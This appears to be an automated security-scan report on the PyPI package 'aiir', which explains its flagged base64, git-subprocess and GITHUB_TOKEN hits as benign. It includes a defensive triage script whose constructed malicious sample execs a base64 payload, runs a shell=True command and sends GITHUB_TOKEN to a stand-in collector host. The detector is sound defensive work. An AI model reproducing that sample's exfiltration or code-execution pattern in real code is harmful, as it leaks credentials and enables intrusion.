aiir v1.6.0

Verdict: suspicious (score 4.0, Medium Risk)

AI Integrity Receipts — cryptographic receipts for commits with declared AI involvement

🤖 AI Analysis

Final verdict: SUSPICIOUS

The scanner found no network-call patterns, but the author metadata is incomplete and the maintainer account looks new or inactive. The only shell activity found is git invoked through subprocess, which is what a tool that hashes commits is expected to do, but it should be documented.

  • Incomplete author information
  • Git invoked via subprocess: consistent with the package's purpose, but confirm it is documented

Per-check LLM notes
  • Network: No network call patterns detected by the heuristic. Note, however, that the credential-access fragments below reference create_check_run and post_pr_comment, so the package does talk to the GitHub API when GITHUB_TOKEN is set.
  • Shell: All three hits run git with a list-form argv ("git", "--no-optional-locks", ...), consistent with reading commit and diff hashes; confirm that the package documentation describes these calls.
  • Metadata: The author name is empty and the maintainer account appears to be new or inactive, which raises some suspicion but is not evidence of malice.

📦 Package Quality Overall: Medium (6.0/10)

◈ Medium Test Suite 6.0

Partial test coverage signals detected

  • Test runner config found: pyproject.toml
◈ Medium Documentation 7.0

Some documentation present

  • Documentation URL: "Documentation" -> https://github.com/invariant-systems-ai/aiir/blob/main/docs/
  • Detailed PyPI description (36425 chars)
○ Low Contributing Guide 4.0

No contributing guide or governance files found

  • Development Status classifier >= Beta
◈ Medium Type Annotations 7.0

Partial type annotation coverage

  • Classifier: Typing :: Typed
  • 273 type-annotated function signatures detected in source
◈ Medium Multiple Contributors 6.0

Limited contributor diversity

  • 2 unique contributors across 100 commits in invariant-systems-ai/aiir

🔬 Heuristic Checks

Outbound Network Calls

No suspicious network call patterns found

Code Obfuscation score 10.0

Found 6 obfuscation pattern(s). All six are base64.b64decode(..., validate=True) calls on receipt fields (certificate_raw, body_b64, canonicalized_body); in the quoted fragments the decoded bytes go to a sha256 digest or to json.loads, and validate=True rejects malformed input rather than hiding anything. This is wire-format decoding of signed material, not obfuscation.

  • b.sha256( base64.b64decode(certificate_raw, validate=True) ).hexdigest(
  • = json.loads( base64.b64decode(canonicalized_body, validate=True).decode("utf-8")
  • lse: try: base64.b64decode(body_b64, validate=True) except (ValueError, TypeErr
  • hash"), "body_bytes": base64.b64decode(str(document["body_b64"]), validate=True), "log_inde
  • try: body_bytes = base64.b64decode(canonicalized_body, validate=True) except (TypeError, Va
  • try: raw = base64.b64decode(encoded, validate=True) except (TypeError, ValueErro
Shell / Subprocess Execution score 6.0

Found 3 shell execution pattern(s). All three run git through subprocess with a list-form argv ("git", "--no-optional-locks", ...), which avoids shell parsing unless shell=True is also passed (not visible in the truncated fragments). --no-optional-locks stops git from taking optional locks (equivalent to GIT_OPTIONAL_LOCKS=0), as expected for read-only queries such as hash-object. The open questions are whether the package documents that it shells out to git and whether args can be influenced by untrusted input.

  • or os.getcwd()) result = subprocess.run( ["git", "--no-optional-locks"] + args, cwd=
  • nto the diff hash. proc = subprocess.Popen( [ "git", "--no-optional-loc
  • try: result = subprocess.run( ["git", "--no-optional-locks", "hash-object
Credential Harvesting score 10.0

Found 4 credential access pattern(s). All four read GITHUB_TOKEN from the environment (or accept it as a parameter); in the quoted fragments the token gates create_check_run and post_pr_comment, both of which need a token with write permission on the repository. Review where that token is sent: it should reach only the GitHub API.

  • """ auth_token = token or os.environ.get("GITHUB_TOKEN", "") if not auth_token: raise RuntimeError("No
  • """ auth_token = token or os.environ.get("GITHUB_TOKEN", "") if not auth_token: return None api_u
  • write permission) if os.environ.get("GITHUB_TOKEN"): try: create_check_run(receip
  • write permission) if os.environ.get("GITHUB_TOKEN"): try: post_pr_comment(receipt
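The three heuristic blocks above (obfuscation, shell, credential access) stop at regex matches, and a reviewer wants to know whether each match is the benign shape quoted (strict base64 decode into hashing and JSON, list-form git argv, GITHUB_TOKEN used for a GitHub API call) or the hostile one. The following script is an added example written for this page; it is not part of aiir and not the scanner that produced the report. It re-checks all three patterns with Python's ast module: base64.b64decode is reported only when the decoded bytes reach exec/eval/compile, subprocess is reported only with shell=True (or os.system/os.popen), and a secret-looking environment read is reported only when the module also carries a URL literal whose host is outside an allowlist. The TRUSTED_HOSTS allowlist, the SECRET_MARKERS list and the two sample modules (BENIGN, built to resemble the quoted fragments, and MALICIOUS) are assumptions constructed for the demonstration; the secret check generalises beyond GITHUB_TOKEN to any TOKEN/SECRET/PASSWORD-named variable.

```python
import ast
from urllib.parse import urlparse

CODE_SINKS = {"exec", "eval", "compile"}
SECRET_MARKERS = ("TOKEN", "SECRET", "PASSWORD")   # assumed naming convention
TRUSTED_HOSTS = {"api.github.com", "github.com"}   # assumed allowlist for GITHUB_TOKEN

def _dotted(node):
    # 'os.environ.get' for an Attribute chain, '' for anything that is not a plain name
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else ""
    return ""

def _has_b64decode(node):
    return any(isinstance(n, ast.Call) and _dotted(n.func) == "base64.b64decode"
               for n in ast.walk(node))

def check_base64_sinks(tree):
    """Lines where exec/eval/compile consume base64.b64decode output, directly or via a name."""
    tainted = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign) and _has_b64decode(node.value):
            tainted |= {t.id for t in node.targets if isinstance(t, ast.Name)}
    hits = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Call) and _dotted(node.func) in CODE_SINKS:
            if any(_has_b64decode(a) or any(isinstance(n, ast.Name) and n.id in tainted
                                            for n in ast.walk(a)) for a in node.args):
                hits.append(node.lineno)
    return hits

def check_subprocess(tree):
    """(line, callee) for subprocess.* with shell=True and for os.system/os.popen only."""
    hits = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        shell = any(k.arg == "shell" and isinstance(k.value, ast.Constant)
                    and k.value.value is True for k in node.keywords)
        if (name.startswith("subprocess.") and shell) or name in {"os.system", "os.popen"}:
            hits.append((node.lineno, name))
    return hits

def check_secret_egress(tree):
    """Secret-looking os.environ reads next to URL literals whose host is not trusted."""
    secrets, hosts = set(), set()
    for node in ast.walk(tree):
        key = None
        if isinstance(node, ast.Call) and _dotted(node.func) == "os.environ.get" and node.args:
            key = node.args[0]
        elif isinstance(node, ast.Subscript) and _dotted(node.value) == "os.environ":
            key = node.slice                       # Python 3.9+: the index expression itself
        if isinstance(key, ast.Constant) and isinstance(key.value, str) \
                and any(m in key.value.upper() for m in SECRET_MARKERS):
            secrets.add(key.value)
        # f-string URLs count too: ast splits them into Constant parts, so the prefix is seen
        if isinstance(node, ast.Constant) and isinstance(node.value, str) \
                and node.value.startswith(("http://", "https://")):
            hosts.add(urlparse(node.value).hostname)
    untrusted = sorted(h for h in hosts if h not in TRUSTED_HOSTS)
    return {"secrets": sorted(secrets), "untrusted_hosts": untrusted,
            "flag": bool(secrets and untrusted)}

def triage(source):
    tree = ast.parse(source)
    return {"base64_to_code_sink": check_base64_sinks(tree),
            "shell_true_or_os_system": check_subprocess(tree),
            "secret_egress": check_secret_egress(tree)}

# Constructed module mirroring the quoted fragments (not aiir's code): list-form git
# argv, strict base64 decode of a receipt body, GITHUB_TOKEN used only against GitHub.
BENIGN = '''
import base64, json, os, subprocess, urllib.request
def git(args, cwd=None):
    return subprocess.run(["git", "--no-optional-locks"] + args, cwd=cwd or os.getcwd())
def verify_body(document):
    body_bytes = base64.b64decode(document["body_b64"], validate=True)
    return json.loads(body_bytes.decode("utf-8"))
def post_pr_comment(repo, number, token=None):
    auth_token = token or os.environ.get("GITHUB_TOKEN", "")
    return urllib.request.Request(f"https://api.github.com/repos/{repo}/issues/{number}/comments",
                                  headers={"Authorization": f"Bearer {auth_token}"})
'''

# Constructed counter-example: the same three regexes match here too, but the decoded
# bytes reach exec, git runs through a shell, and the token leaves for a non-GitHub host.
MALICIOUS = '''
import base64, os, subprocess, urllib.request
payload = base64.b64decode("aW1wb3J0IG9z")
exec(payload)
subprocess.run("git log " + os.environ["BRANCH"], shell=True)
tok = os.environ["GITHUB_TOKEN"]
urllib.request.urlopen("https://collector.example/ingest?t=" + tok)
'''
```

Running triage() on BENIGN returns empty sink and shell lists and only the expected GITHUB_TOKEN read with no untrusted host, while MALICIOUS reports the exec line, the shell=True call and the collector host. It is still a heuristic: the taint tracking follows a single assignment, not calls across functions, so treat a clean result as a reason to read the code, not as permission to skip it.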
Typosquatting

No typosquatting candidates detected

Registered Email Domain

Email domain looks legitimate: invariantsystems.io

Suspicious Page Links

All external links appear legitimate

Git Repository History

Repository invariant-systems-ai/aiir appears legitimate

Maintainer History score 4.0

2 maintainer concern(s) found

  • Author name is missing (empty string in the package metadata)
  • The author account appears to have only 1 package on PyPI (new or inactive account)
Known CVE Vulnerabilities

No known vulnerabilities found in OSV database.

💡 AI App Starter Prompt

Use this prompt to build a project with aiir
Develop a version control integrity checker application named 'AICommitGuardian' using Python and the 'aiir' package. This tool will help developers ensure that their codebase remains trustworthy by generating cryptographic receipts for commits where AI tools were involved in the development process. Here’s a step-by-step guide on how to build this application:

1. **Project Setup**: Start by setting up your Python environment. Ensure you have Git installed and properly configured. Install the 'aiir' package via pip.
2. **Application Structure**: Design the basic structure of your application. It should include modules for handling Git operations, interfacing with the 'aiir' package, and displaying results.
3. **Git Integration**: Implement functionality to connect to a local or remote Git repository. Allow users to select which repository they want to monitor.
4. **Commit Analysis**: Develop a feature that scans through commit history to identify commits where AI tools were used. Use the 'aiir' package to generate cryptographic receipts for these commits.
5. **Integrity Verification**: Create a system within the application to verify the integrity of commits based on the generated cryptographic receipts. Users should be able to check if any commit has been tampered with since the receipt was issued.
6. **User Interface**: Design a simple yet effective command-line interface (CLI) or graphical user interface (GUI) for interacting with the application. Ensure it provides clear feedback and error messages.
7. **Reporting**: Include a reporting feature that compiles a summary of all verified commits and any anomalies detected during the integrity verification process.
8. **Testing and Documentation**: Thoroughly test the application to ensure it works as expected. Write comprehensive documentation detailing how to install, configure, and use the application effectively.

The 'aiir' package plays a crucial role in this application by providing the necessary functions to create and validate cryptographic receipts for commits involving AI. This ensures that developers can trust the authenticity and integrity of their codebase, especially when leveraging AI tools in their development workflow.